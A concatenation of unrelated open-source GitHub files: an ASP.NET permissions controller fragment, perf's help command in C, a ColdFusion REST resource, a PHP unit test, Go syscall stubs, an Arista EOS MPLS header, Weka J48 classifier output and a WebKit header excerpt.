_permissionDbContext.Update(rolePermissionDeclaration);
await _permissionDbContext.SaveChangesAsync();
}
catch (DbUpdateConcurrencyException)
{
if (!RolePermissionDeclarationExists(rolePermissionDeclaration.PermissionDefinitionId))
{
return NotFound();
}
else
{
throw;
}
}
return RedirectToAction(nameof(Index));
}
ViewData["PermissionDefinition"] = new SelectList(_permissionDbContext.PermissionDefinitions, "Id", "Name", rolePermissionDeclaration.PermissionDefinitionId);
ViewData["Role"] = new SelectList(_identityDbContext.Roles, "Id", "Name", rolePermissionDeclaration.RoleId);
return View(rolePermissionDeclaration);
}
// GET: Manage/RolePermissionDeclaration/Delete/5
public async Task<IActionResult> Delete(int? id)
{
if (id == null)
{
return NotFound();
}
var rolePermissionDeclaration = await _permissionDbContext.RolePermissionDeclarations
.Include(r => r.PermissionDefinition)
.FirstOrDefaultAsync(m => m.PermissionDefinitionId == id);
if (rolePermissionDeclaration == null)
{
return NotFound();
}
return View(rolePermissionDeclaration);
}
// POST: Manage/RolePermissionDeclaration/Delete/5
[HttpPost, ActionName("Delete")]
[ValidateAntiForgeryToken]
public async Task<IActionResult> DeleteConfirmed(Guid id)
{
var rolePermissionDeclaration = await _permissionDbContext.RolePermissionDeclarations.FindAsync(id);
_permissionDbContext.RolePermissionDeclarations.Remove(rolePermissionDeclaration);
await _permissionDbContext.SaveChangesAsync();
return RedirectToAction(nameof(Index));
}
private bool RolePermissionDeclarationExists(int? id)
{
return _permissionDbContext.RolePermissionDeclarations.Any(e => e.PermissionDefinitionId == id);
}
}
}
| {
"pile_set_name": "Github"
} |
/*
* builtin-help.c
*
* Builtin help command
*/
#include "perf.h"
#include "util/config.h"
#include "builtin.h"
#include <subcmd/exec-cmd.h>
#include "common-cmds.h"
#include <subcmd/parse-options.h>
#include <subcmd/run-command.h>
#include <subcmd/help.h>
#include "util/debug.h"
static struct man_viewer_list {
struct man_viewer_list *next;
char name[FLEX_ARRAY];
} *man_viewer_list;
static struct man_viewer_info_list {
struct man_viewer_info_list *next;
const char *info;
char name[FLEX_ARRAY];
} *man_viewer_info_list;
enum help_format {
HELP_FORMAT_NONE,
HELP_FORMAT_MAN,
HELP_FORMAT_INFO,
HELP_FORMAT_WEB,
};
static enum help_format parse_help_format(const char *format)
{
if (!strcmp(format, "man"))
return HELP_FORMAT_MAN;
if (!strcmp(format, "info"))
return HELP_FORMAT_INFO;
if (!strcmp(format, "web") || !strcmp(format, "html"))
return HELP_FORMAT_WEB;
pr_err("unrecognized help format '%s'", format);
return HELP_FORMAT_NONE;
}
static const char *get_man_viewer_info(const char *name)
{
struct man_viewer_info_list *viewer;
for (viewer = man_viewer_info_list; viewer; viewer = viewer->next) {
if (!strcasecmp(name, viewer->name))
return viewer->info;
}
return NULL;
}
static int check_emacsclient_version(void)
{
struct strbuf buffer = STRBUF_INIT;
struct child_process ec_process;
const char *argv_ec[] = { "emacsclient", "--version", NULL };
int version;
int ret = -1;
/* emacsclient prints its version number on stderr */
memset(&ec_process, 0, sizeof(ec_process));
ec_process.argv = argv_ec;
ec_process.err = -1;
ec_process.stdout_to_stderr = 1;
if (start_command(&ec_process)) {
fprintf(stderr, "Failed to start emacsclient.\n");
return -1;
}
if (strbuf_read(&buffer, ec_process.err, 20) < 0) {
fprintf(stderr, "Failed to read emacsclient version\n");
goto out;
}
close(ec_process.err);
/*
* Don't bother checking return value, because "emacsclient --version"
* seems to always exits with code 1.
*/
finish_command(&ec_process);
if (prefixcmp(buffer.buf, "emacsclient")) {
fprintf(stderr, "Failed to parse emacsclient version.\n");
goto out;
}
version = atoi(buffer.buf + strlen("emacsclient"));
if (version < 22) {
fprintf(stderr,
"emacsclient version '%d' too old (< 22).\n",
version);
} else
ret = 0;
out:
strbuf_release(&buffer);
return ret;
}
static void exec_woman_emacs(const char *path, const char *page)
{
char sbuf[STRERR_BUFSIZE];
if (!check_emacsclient_version()) {
/* This works only with emacsclient version >= 22. */
char *man_page;
if (!path)
path = "emacsclient";
if (asprintf(&man_page, "(woman \"%s\")", page) > 0) {
execlp(path, "emacsclient", "-e", man_page, NULL);
free(man_page);
}
warning("failed to exec '%s': %s", path,
str_error_r(errno, sbuf, sizeof(sbuf)));
}
}
static void exec_man_konqueror(const char *path, const char *page)
{
const char *display = getenv("DISPLAY");
if (display && *display) {
char *man_page;
const char *filename = "kfmclient";
char sbuf[STRERR_BUFSIZE];
/* It's simpler to launch konqueror using kfmclient. */
if (path) {
const char *file = strrchr(path, '/');
if (file && !strcmp(file + 1, "konqueror")) {
char *new = strdup(path);
char *dest = strrchr(new, '/');
/* strlen("konqueror") == strlen("kfmclient") */
strcpy(dest + 1, "kfmclient");
path = new;
}
if (file)
filename = file;
} else
path = "kfmclient";
if (asprintf(&man_page, "man:%s(1)", page) > 0) {
execlp(path, filename, "newTab", man_page, NULL);
free(man_page);
}
warning("failed to exec '%s': %s", path,
str_error_r(errno, sbuf, sizeof(sbuf)));
}
}
static void exec_man_man(const char *path, const char *page)
{
char sbuf[STRERR_BUFSIZE];
if (!path)
path = "man";
execlp(path, "man", page, NULL);
warning("failed to exec '%s': %s", path,
str_error_r(errno, sbuf, sizeof(sbuf)));
}
static void exec_man_cmd(const char *cmd, const char *page)
{
char sbuf[STRERR_BUFSIZE];
char *shell_cmd;
if (asprintf(&shell_cmd, "%s %s", cmd, page) > 0) {
execl("/bin/sh", "sh", "-c", shell_cmd, NULL);
free(shell_cmd);
}
warning("failed to exec '%s': %s", cmd,
str_error_r(errno, sbuf, sizeof(sbuf)));
}
static void add_man_viewer(const char *name)
{
struct man_viewer_list **p = &man_viewer_list;
size_t len = strlen(name);
while (*p)
p = &((*p)->next);
*p = zalloc(sizeof(**p) + len + 1);
strncpy((*p)->name, name, len);
}
static int supported_man_viewer(const char *name, size_t len)
{
return (!strncasecmp("man", name, len) ||
!strncasecmp("woman", name, len) ||
!strncasecmp("konqueror", name, len));
}
static void do_add_man_viewer_info(const char *name,
size_t len,
const char *value)
{
struct man_viewer_info_list *new = zalloc(sizeof(*new) + len + 1);
strncpy(new->name, name, len);
new->info = strdup(value);
new->next = man_viewer_info_list;
man_viewer_info_list = new;
}
static int add_man_viewer_path(const char *name,
size_t len,
const char *value)
{
if (supported_man_viewer(name, len))
do_add_man_viewer_info(name, len, value);
else
warning("'%s': path for unsupported man viewer.\n"
"Please consider using 'man.<tool>.cmd' instead.",
name);
return 0;
}
static int add_man_viewer_cmd(const char *name,
size_t len,
const char *value)
{
if (supported_man_viewer(name, len))
warning("'%s': cmd for supported man viewer.\n"
"Please consider using 'man.<tool>.path' instead.",
name);
else
do_add_man_viewer_info(name, len, value);
return 0;
}
static int add_man_viewer_info(const char *var, const char *value)
{
const char *name = var + 4;
const char *subkey = strrchr(name, '.');
if (!subkey)
return error("Config with no key for man viewer: %s", name);
if (!strcmp(subkey, ".path")) {
if (!value)
return config_error_nonbool(var);
return add_man_viewer_path(name, subkey - name, value);
}
if (!strcmp(subkey, ".cmd")) {
if (!value)
return config_error_nonbool(var);
return add_man_viewer_cmd(name, subkey - name, value);
}
warning("'%s': unsupported man viewer sub key.", subkey);
return 0;
}
static int perf_help_config(const char *var, const char *value, void *cb)
{
enum help_format *help_formatp = cb;
if (!strcmp(var, "help.format")) {
if (!value)
return config_error_nonbool(var);
*help_formatp = parse_help_format(value);
if (*help_formatp == HELP_FORMAT_NONE)
return -1;
return 0;
}
if (!strcmp(var, "man.viewer")) {
if (!value)
return config_error_nonbool(var);
add_man_viewer(value);
return 0;
}
if (!prefixcmp(var, "man."))
return add_man_viewer_info(var, value);
return 0;
}
static struct cmdnames main_cmds, other_cmds;
void list_common_cmds_help(void)
{
unsigned int i, longest = 0;
for (i = 0; i < ARRAY_SIZE(common_cmds); i++) {
if (longest < strlen(common_cmds[i].name))
longest = strlen(common_cmds[i].name);
}
puts(" The most commonly used perf commands are:");
for (i = 0; i < ARRAY_SIZE(common_cmds); i++) {
printf(" %-*s ", longest, common_cmds[i].name);
puts(common_cmds[i].help);
}
}
static int is_perf_command(const char *s)
{
return is_in_cmdlist(&main_cmds, s) ||
is_in_cmdlist(&other_cmds, s);
}
static const char *cmd_to_page(const char *perf_cmd)
{
char *s;
if (!perf_cmd)
return "perf";
else if (!prefixcmp(perf_cmd, "perf"))
return perf_cmd;
return asprintf(&s, "perf-%s", perf_cmd) < 0 ? NULL : s;
}
static void setup_man_path(void)
{
char *new_path;
const char *old_path = getenv("MANPATH");
/* We should always put ':' after our path. If there is no
* old_path, the ':' at the end will let 'man' to try
* system-wide paths after ours to find the manual page. If
* there is old_path, we need ':' as delimiter. */
if (asprintf(&new_path, "%s:%s", system_path(PERF_MAN_PATH), old_path ?: "") > 0) {
setenv("MANPATH", new_path, 1);
free(new_path);
} else {
error("Unable to setup man path");
}
}
static void exec_viewer(const char *name, const char *page)
{
const char *info = get_man_viewer_info(name);
if (!strcasecmp(name, "man"))
exec_man_man(info, page);
else if (!strcasecmp(name, "woman"))
exec_woman_emacs(info, page);
else if (!strcasecmp(name, "konqueror"))
exec_man_konqueror(info, page);
else if (info)
exec_man_cmd(info, page);
else
warning("'%s': unknown man viewer.", name);
}
static int show_man_page(const char *perf_cmd)
{
struct man_viewer_list *viewer;
const char *page = cmd_to_page(perf_cmd);
const char *fallback = getenv("PERF_MAN_VIEWER");
setup_man_path();
for (viewer = man_viewer_list; viewer; viewer = viewer->next)
exec_viewer(viewer->name, page); /* will return when unable */
if (fallback)
exec_viewer(fallback, page);
exec_viewer("man", page);
pr_err("no man viewer handled the request");
return -1;
}
static int show_info_page(const char *perf_cmd)
{
const char *page = cmd_to_page(perf_cmd);
setenv("INFOPATH", system_path(PERF_INFO_PATH), 1);
execlp("info", "info", "perfman", page, NULL);
return -1;
}
static int get_html_page_path(char **page_path, const char *page)
{
struct stat st;
const char *html_path = system_path(PERF_HTML_PATH);
/* Check that we have a perf documentation directory. */
if (stat(mkpath("%s/perf.html", html_path), &st)
|| !S_ISREG(st.st_mode)) {
pr_err("'%s': not a documentation directory.", html_path);
return -1;
}
return asprintf(page_path, "%s/%s.html", html_path, page);
}
/*
* If open_html is not defined in a platform-specific way (see for
* example compat/mingw.h), we use the script web--browse to display
* HTML.
*/
#ifndef open_html
static void open_html(const char *path)
{
execl_cmd("web--browse", "-c", "help.browser", path, NULL);
}
#endif
static int show_html_page(const char *perf_cmd)
{
const char *page = cmd_to_page(perf_cmd);
char *page_path; /* it leaks but we exec bellow */
if (get_html_page_path(&page_path, page) < 0)
return -1;
open_html(page_path);
return 0;
}
int cmd_help(int argc, const char **argv, const char *prefix __maybe_unused)
{
bool show_all = false;
enum help_format help_format = HELP_FORMAT_MAN;
struct option builtin_help_options[] = {
OPT_BOOLEAN('a', "all", &show_all, "print all available commands"),
OPT_SET_UINT('m', "man", &help_format, "show man page", HELP_FORMAT_MAN),
OPT_SET_UINT('w', "web", &help_format, "show manual in web browser",
HELP_FORMAT_WEB),
OPT_SET_UINT('i', "info", &help_format, "show info page",
HELP_FORMAT_INFO),
OPT_END(),
};
const char * const builtin_help_subcommands[] = {
"buildid-cache", "buildid-list", "diff", "evlist", "help", "list",
"record", "report", "bench", "stat", "timechart", "top", "annotate",
"script", "sched", "kmem", "lock", "kvm", "test", "inject", "mem", "data",
#ifdef HAVE_LIBELF_SUPPORT
"probe",
#endif
#ifdef HAVE_LIBAUDIT_SUPPORT
"trace",
#endif
NULL };
const char *builtin_help_usage[] = {
"perf help [--all] [--man|--web|--info] [command]",
NULL
};
const char *alias;
int rc = 0;
load_command_list("perf-", &main_cmds, &other_cmds);
perf_config(perf_help_config, &help_format);
argc = parse_options_subcommand(argc, argv, builtin_help_options,
builtin_help_subcommands, builtin_help_usage, 0);
if (show_all) {
printf("\n Usage: %s\n\n", perf_usage_string);
list_commands("perf commands", &main_cmds, &other_cmds);
printf(" %s\n\n", perf_more_info_string);
return 0;
}
if (!argv[0]) {
printf("\n usage: %s\n\n", perf_usage_string);
list_common_cmds_help();
printf("\n %s\n\n", perf_more_info_string);
return 0;
}
alias = alias_lookup(argv[0]);
if (alias && !is_perf_command(argv[0])) {
printf("`perf %s' is aliased to `%s'\n", argv[0], alias);
return 0;
}
switch (help_format) {
case HELP_FORMAT_MAN:
rc = show_man_page(argv[0]);
break;
case HELP_FORMAT_INFO:
rc = show_info_page(argv[0]);
break;
case HELP_FORMAT_WEB:
rc = show_html_page(argv[0]);
break;
case HELP_FORMAT_NONE:
/* fall-through */
default:
rc = -1;
break;
}
return rc;
}
| {
"pile_set_name": "Github"
} |
<cfcomponent extends="taffy.core.resource" taffy:uri="/echo_regex/{id:\d{5}}">
<cffunction name="get">
<cfargument name="id" />
<cfset local.headers = {}/>
<cfset local.headers['x-dude'] = "dude!" />
<cfreturn representationOf(arguments).withStatus(999).withHeaders(local.headers) />
</cffunction>
<cffunction name="put">
<cfargument name="id" />
<cfreturn representationOf(arguments).withStatus(200) />
</cffunction>
<cffunction name="post">
<cfargument name="id" />
<cfreturn representationOf(arguments).withStatus(200) />
</cffunction>
<cffunction name="setDependency2">
<cfargument name="dependency2" />
<cfset this.dependency2 = arguments.dependency2 />
</cffunction>
</cfcomponent>
| {
"pile_set_name": "Github"
} |
<?php
namespace CacheTool\Proxy;
class PhpProxyTest extends ProxyTest
{
public function testGetFunctions()
{
$this->assertCount(8, $this->createProxyInstance()->getFunctions());
}
public function testFunctions()
{
$this->assertProxyCode("return extension_loaded('ext');", 'extension_loaded', ['ext']);
$this->assertProxyCode("return ini_get('var');", 'ini_get', ['var']);
$this->assertProxyCode("return ini_set('var', 'value');", 'ini_set', ['var', 'value']);
$this->assertProxyCode("return phpversion('php');", 'phpversion', ['php']);
$this->assertProxyCode("passthru", '_eval', ['passthru']);
$this->assertProxyCode('return realpath_cache_get();', 'stat_realpath_get', []);
$this->assertProxyCode('return realpath_cache_size();', 'stat_realpath_size', []);
$this->assertProxyCode('return clearstatcache(true);', 'stat_cache_clear', []);
}
protected function createProxyInstance()
{
return new PhpProxy();
}
}
| {
"pile_set_name": "Github"
} |
// Copyright 2009 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
// +build !gccgo
#include "textflag.h"
//
// System call support for 386, Darwin
//
// Just jump to package syscall's implementation for all these functions.
// The runtime may know about them.
TEXT ·Syscall(SB),NOSPLIT,$0-28
JMP syscall·Syscall(SB)
TEXT ·Syscall6(SB),NOSPLIT,$0-40
JMP syscall·Syscall6(SB)
TEXT ·Syscall9(SB),NOSPLIT,$0-52
JMP syscall·Syscall9(SB)
TEXT ·RawSyscall(SB),NOSPLIT,$0-28
JMP syscall·RawSyscall(SB)
TEXT ·RawSyscall6(SB),NOSPLIT,$0-40
JMP syscall·RawSyscall6(SB)
| {
"pile_set_name": "Github"
} |
// Copyright (c) 2019 Arista Networks, Inc. All rights reserved.
// Arista Networks, Inc. Confidential and Proprietary.
#ifndef EOS_INLINE_TYPES_MPLS_ROUTE_H
#define EOS_INLINE_TYPES_MPLS_ROUTE_H
namespace eos {
inline mpls_route_key_t::mpls_route_key_t() :
labels_(std::vector< mpls_label_t >{0}), metric_(0) {
}
inline mpls_route_key_t::mpls_route_key_t(mpls_label_t top_label,
mpls_route_metric_t metric) :
labels_(std::vector< mpls_label_t >{top_label}), metric_(metric) {
if (top_label.label() > (uint32_t)mpls_label_t::MAX) {
panic(invalid_mpls_label(top_label.label()));
}
}
inline mpls_route_key_t::mpls_route_key_t(std::vector<mpls_label_t> const & labels,
mpls_route_metric_t metric) :
labels_(labels), metric_(metric) {
for (auto label: labels) {
if (label.label() > (uint32_t)mpls_label_t::MAX) {
panic(invalid_mpls_label(label.label()));
}
}
}
inline std::vector<mpls_label_t> const &
mpls_route_key_t::labels() const {
return labels_;
}
inline void
mpls_route_key_t::labels_is(std::vector<mpls_label_t> const & labels) {
labels_ = labels;
}
inline void
mpls_route_key_t::label_set(uint32_t index, mpls_label_t const & value) {
labels_.insert(labels_.begin() + index, value);
}
inline void
mpls_route_key_t::label_del(uint32_t index) {
labels_.erase(labels_.begin() + index);
}
inline mpls_route_metric_t
mpls_route_key_t::metric() const {
return metric_;
}
inline void
mpls_route_key_t::metric_is(mpls_route_metric_t metric) {
metric_ = metric;
}
inline mpls_label_t
mpls_route_key_t::top_label() const {
if (labels_.empty()) {
return mpls_label_t();
} else {
return labels_.front();
}
}
inline void
mpls_route_key_t::top_label_is(mpls_label_t top_label) {
labels_ = std::vector< mpls_label_t > { top_label };
}
inline bool
mpls_route_key_t::operator==(mpls_route_key_t const & other) const {
return labels_ == other.labels_ &&
metric_ == other.metric_;
}
inline bool
mpls_route_key_t::operator!=(mpls_route_key_t const & other) const {
return !operator==(other);
}
inline bool
mpls_route_key_t::operator<(mpls_route_key_t const & other) const {
if(labels_ != other.labels_) {
return labels_ < other.labels_;
} else if(metric_ != other.metric_) {
return metric_ < other.metric_;
}
return false;
}
inline uint32_t
mpls_route_key_t::hash() const {
uint32_t ret = 0;
for (auto it=labels_.cbegin(); it!=labels_.cend(); ++it) {
ret = hash_mix::mix((uint8_t *)&(*it),
sizeof(mpls_label_t), ret);
}
ret = hash_mix::mix((uint8_t *)&metric_,
sizeof(mpls_route_metric_t), ret);
ret = hash_mix::final_mix(ret);
return ret;
}
inline std::string
mpls_route_key_t::to_string() const {
std::ostringstream ss;
ss << "mpls_route_key_t(";
ss << "labels=" <<"'";
bool first_labels = true;
for (auto it=labels_.cbegin(); it!=labels_.cend(); ++it) {
if (first_labels) {
ss << (*it);
first_labels = false;
} else {
ss << "," << (*it);
}
}
ss << "'";
ss << ", metric=" << metric_;
ss << ")";
return ss.str();
}
inline std::ostream&
operator<<(std::ostream& os, const mpls_route_key_t& obj) {
os << obj.to_string();
return os;
}
inline mpls_route_t::mpls_route_t() :
key_() {
}
inline mpls_route_t::mpls_route_t(mpls_route_key_t key) :
key_(key) {
}
inline mpls_route_key_t
mpls_route_t::key() const {
return key_;
}
inline void
mpls_route_t::key_is(mpls_route_key_t key) {
key_ = key;
}
inline bool
mpls_route_t::operator==(mpls_route_t const & other) const {
return key_ == other.key_;
}
inline bool
mpls_route_t::operator!=(mpls_route_t const & other) const {
return !operator==(other);
}
inline uint32_t
mpls_route_t::hash() const {
uint32_t ret = 0;
ret = hash_mix::mix((uint8_t *)&key_,
sizeof(mpls_route_key_t), ret);
ret = hash_mix::final_mix(ret);
return ret;
}
inline std::string
mpls_route_t::to_string() const {
std::ostringstream ss;
ss << "mpls_route_t(";
ss << "key=" << key_;
ss << ")";
return ss.str();
}
inline std::ostream&
operator<<(std::ostream& os, const mpls_route_t& obj) {
os << obj.to_string();
return os;
}
inline mpls_route_via_t::mpls_route_via_t() :
route_key_(), hop_(), intf_(), pushswap_label_(0),
label_action_(MPLS_ACTION_NULL), ttl_mode_(MPLS_TTLMODE_NULL),
payload_type_(MPLS_PAYLOAD_TYPE_NULL), skip_egress_acl_(false),
nexthop_group_() {
}
inline mpls_route_via_t::mpls_route_via_t(mpls_route_key_t route_key) :
route_key_(route_key), hop_(), intf_(), pushswap_label_(0),
label_action_(MPLS_ACTION_NULL), ttl_mode_(MPLS_TTLMODE_NULL),
payload_type_(MPLS_PAYLOAD_TYPE_NULL), skip_egress_acl_(false),
nexthop_group_() {
}
inline mpls_route_via_t::mpls_route_via_t(mpls_route_key_t route_key,
mpls_action_t label_action) :
route_key_(route_key), hop_(), intf_(), pushswap_label_(0),
label_action_(label_action), ttl_mode_(MPLS_TTLMODE_NULL),
payload_type_(MPLS_PAYLOAD_TYPE_NULL), skip_egress_acl_(false),
nexthop_group_() {
}
inline mpls_route_key_t
mpls_route_via_t::route_key() const {
return route_key_;
}
inline void
mpls_route_via_t::route_key_is(mpls_route_key_t route_key) {
route_key_ = route_key;
}
inline ip_addr_t
mpls_route_via_t::hop() const {
return hop_;
}
inline void
mpls_route_via_t::hop_is(ip_addr_t const & hop) {
hop_ = hop;
}
inline intf_id_t
mpls_route_via_t::intf() const {
return intf_;
}
inline void
mpls_route_via_t::intf_is(intf_id_t const & intf) {
intf_ = intf;
}
inline mpls_label_t
mpls_route_via_t::pushswap_label() const {
return pushswap_label_;
}
inline void
mpls_route_via_t::pushswap_label_is(mpls_label_t pushswap_label) {
pushswap_label_ = pushswap_label;
}
inline mpls_action_t
mpls_route_via_t::label_action() const {
return label_action_;
}
inline void
mpls_route_via_t::label_action_is(mpls_action_t label_action) {
label_action_ = label_action;
}
inline mpls_ttl_mode_t
mpls_route_via_t::ttl_mode() const {
return ttl_mode_;
}
inline void
mpls_route_via_t::ttl_mode_is(mpls_ttl_mode_t ttl_mode) {
ttl_mode_ = ttl_mode;
}
inline mpls_payload_type_t
mpls_route_via_t::payload_type() const {
return payload_type_;
}
inline void
mpls_route_via_t::payload_type_is(mpls_payload_type_t payload_type) {
payload_type_ = payload_type;
}
inline bool
mpls_route_via_t::skip_egress_acl() const {
return skip_egress_acl_;
}
inline void
mpls_route_via_t::skip_egress_acl_is(bool skip_egress_acl) {
skip_egress_acl_ = skip_egress_acl;
}
inline std::string
mpls_route_via_t::nexthop_group() const {
return nexthop_group_;
}
inline void
mpls_route_via_t::nexthop_group_is(std::string nexthop_group) {
nexthop_group_ = nexthop_group;
}
inline bool
mpls_route_via_t::operator==(mpls_route_via_t const & other) const {
return route_key_ == other.route_key_ &&
hop_ == other.hop_ &&
intf_ == other.intf_ &&
pushswap_label_ == other.pushswap_label_ &&
label_action_ == other.label_action_ &&
ttl_mode_ == other.ttl_mode_ &&
payload_type_ == other.payload_type_ &&
skip_egress_acl_ == other.skip_egress_acl_ &&
nexthop_group_ == other.nexthop_group_;
}
inline bool
mpls_route_via_t::operator!=(mpls_route_via_t const & other) const {
return !operator==(other);
}
inline uint32_t
mpls_route_via_t::hash() const {
uint32_t ret = 0;
ret = hash_mix::mix((uint8_t *)&route_key_,
sizeof(mpls_route_key_t), ret);
ret = hash_mix::mix((uint8_t *)&hop_,
sizeof(ip_addr_t), ret);
ret = hash_mix::mix((uint8_t *)&intf_,
sizeof(intf_id_t), ret);
ret = hash_mix::mix((uint8_t *)&pushswap_label_,
sizeof(mpls_label_t), ret);
ret = hash_mix::mix((uint8_t *)&label_action_,
sizeof(mpls_action_t), ret);
ret = hash_mix::mix((uint8_t *)&ttl_mode_,
sizeof(mpls_ttl_mode_t), ret);
ret = hash_mix::mix((uint8_t *)&payload_type_,
sizeof(mpls_payload_type_t), ret);
ret = hash_mix::mix((uint8_t *)&skip_egress_acl_,
sizeof(bool), ret);
ret ^= std::hash<std::string>()(nexthop_group_);
ret = hash_mix::final_mix(ret);
return ret;
}
inline std::string
mpls_route_via_t::to_string() const {
std::ostringstream ss;
ss << "mpls_route_via_t(";
ss << "route_key=" << route_key_;
ss << ", hop=" << hop_;
ss << ", intf=" << intf_;
ss << ", pushswap_label=" << pushswap_label_;
ss << ", label_action=" << label_action_;
ss << ", ttl_mode=" << ttl_mode_;
ss << ", payload_type=" << payload_type_;
ss << ", skip_egress_acl=" << skip_egress_acl_;
ss << ", nexthop_group='" << nexthop_group_ << "'";
ss << ")";
return ss.str();
}
inline std::ostream&
operator<<(std::ostream& os, const mpls_route_via_t& obj) {
os << obj.to_string();
return os;
}
inline mpls_fec_id_t::mpls_fec_id_t() :
id_(0) {
}
inline mpls_fec_id_t::mpls_fec_id_t(uint64_t id) :
id_(id) {
}
inline uint64_t
mpls_fec_id_t::id() const {
return id_;
}
inline void
mpls_fec_id_t::id_is(uint64_t id) {
id_ = id;
}
inline bool
mpls_fec_id_t::operator==(mpls_fec_id_t const & other) const {
return id_ == other.id_;
}
inline bool
mpls_fec_id_t::operator!=(mpls_fec_id_t const & other) const {
return !operator==(other);
}
inline bool
mpls_fec_id_t::operator<(mpls_fec_id_t const & other) const {
if(id_ != other.id_) {
return id_ < other.id_;
}
return false;
}
inline uint32_t
mpls_fec_id_t::hash() const {
uint32_t ret = 0;
ret = hash_mix::mix((uint8_t *)&id_,
sizeof(uint64_t), ret);
ret = hash_mix::final_mix(ret);
return ret;
}
inline std::string
mpls_fec_id_t::to_string() const {
std::ostringstream ss;
ss << "mpls_fec_id_t(";
ss << "id=" << id_;
ss << ")";
return ss.str();
}
inline std::ostream&
operator<<(std::ostream& os, const mpls_fec_id_t& obj) {
os << obj.to_string();
return os;
}
}
#endif // EOS_INLINE_TYPES_MPLS_ROUTE_H
| {
"pile_set_name": "Github"
} |
=== Classifier model (full training set) ===
J48 pruned tree
------------------
A9 = t
| A10 = t: + (228.0/21.0)
| A10 = f
| | A15 <= 444
| | | A7 = v
| | | | A4 = u
| | | | | A14 <= 112
| | | | | | A15 <= 33: + (14.0)
| | | | | | A15 > 33: - (3.0/1.0)
| | | | | A14 > 112
| | | | | | A15 <= 70: - (30.0/10.0)
| | | | | | A15 > 70: + (2.0)
| | | | A4 = y
| | | | | A13 = g: - (12.0/2.0)
| | | | | A13 = p: - (0.0)
| | | | | A13 = s: + (3.0/1.0)
| | | | A4 = l: - (0.0)
| | | | A4 = t: - (0.0)
| | | A7 = h: + (27.0/8.0)
| | | A7 = bb
| | | | A2 <= 27.33: + (3.0)
| | | | A2 > 27.33
| | | | | A3 <= 1.375: + (3.0/1.0)
| | | | | A3 > 1.375: - (8.0)
| | | A7 = j: - (1.0)
| | | A7 = n: + (0.0)
| | | A7 = z: + (0.0)
| | | A7 = dd: + (1.0)
| | | A7 = ff: - (5.0/1.0)
| | | A7 = o: + (0.0)
| | A15 > 444: + (21.0/1.0)
A9 = f
| A3 <= 0.165
| | A7 = v
| | | A2 <= 35.58: - (20.0/4.0)
| | | A2 > 35.58: + (4.0)
| | A7 = h: - (0.0)
| | A7 = bb: + (1.0)
| | A7 = j: + (1.0)
| | A7 = n: + (1.0)
| | A7 = z: - (0.0)
| | A7 = dd: - (0.0)
| | A7 = ff: - (4.0)
| | A7 = o: - (0.0)
| A3 > 0.165: - (298.0/12.0)
Number of Leaves : 32
Size of the tree : 46
Time taken to build model: 0.75 seconds
Time taken to test model on training data: 0.04 seconds
=== Error on training data ===
Correctly Classified Instances 628 91.0145 %
Incorrectly Classified Instances 62 8.9855 %
Kappa statistic 0.8182
Mean absolute error 0.1493
Root mean squared error 0.2732
Relative absolute error 30.2194 %
Root relative squared error 54.9732 %
Total Number of Instances 690
=== Detailed Accuracy By Class ===
TP Rate FP Rate Precision Recall F-Measure MCC ROC Area PRC Area Class
0.902 0.084 0.896 0.902 0.899 0.818 0.943 0.906 +
0.916 0.098 0.921 0.916 0.919 0.818 0.943 0.936 -
Weighted Avg. 0.910 0.091 0.910 0.910 0.910 0.818 0.943 0.923
=== Confusion Matrix ===
a b <-- classified as
277 30 | a = +
32 351 | b = -
Time taken to perform cross-validation: 0.84 seconds
=== Stratified cross-validation ===
Correctly Classified Instances 593 85.942 %
Incorrectly Classified Instances 97 14.058 %
Kappa statistic 0.7151
Mean absolute error 0.1925
Root mean squared error 0.3375
Relative absolute error 38.9675 %
Root relative squared error 67.9034 %
Total Number of Instances 690
=== Detailed Accuracy By Class ===
TP Rate FP Rate Precision Recall F-Measure MCC ROC Area PRC Area Class
0.837 0.123 0.845 0.837 0.841 0.715 0.874 0.788 +
0.877 0.163 0.870 0.877 0.874 0.715 0.874 0.861 -
Weighted Avg. 0.859 0.145 0.859 0.859 0.859 0.715 0.874 0.829
=== Confusion Matrix ===
a b <-- classified as
257 50 | a = +
47 336 | b = -
| {
"pile_set_name": "Github"
} |
/*
* Copyright (C) 2013 Apple Inc. All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
*
* THIS SOFTWARE IS PROVIDED BY APPLE COMPUTER, INC. ``AS IS'' AND ANY
* EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
* PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL APPLE COMPUTER, INC. OR
* CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
* EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
* PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
* PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY
* OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
* (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
* OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
#ifndef MediaStreamCapabilities_h
#define MediaStreamCapabilities_h
#if ENABLE(MEDIA_STREAM)
#include "MediaStreamCapabilities.h"
#include "MediaStreamSourceCapabilities.h"
#include "ScriptWrappable.h"
#include <wtf/RefCounted.h>
#include <wtf/Vector.h>
#include <wtf/text/WTFString.h>
namespace WebCore {
class CapabilityRange;
class MediaStreamSourceCapabilities;
class MediaStreamCapabilities : public RefCounted<MediaStreamCapabilities>, public ScriptWrappable {
public:
static RefPtr<MediaStreamCapabilities> create(PassRefPtr<MediaStreamSourceCapabilities>);
virtual ~MediaStreamCapabilities() { }
virtual Vector<String> sourceType() const;
virtual Vector<String> sourceId() const;
virtual RefPtr<CapabilityRange> width() const;
virtual RefPtr<CapabilityRange> height() const;
virtual RefPtr<CapabilityRange> frameRate() const;
virtual RefPtr<CapabilityRange> aspectRatio() const;
virtual Vector<String> facingMode() const;
virtual RefPtr<CapabilityRange> volume() const;
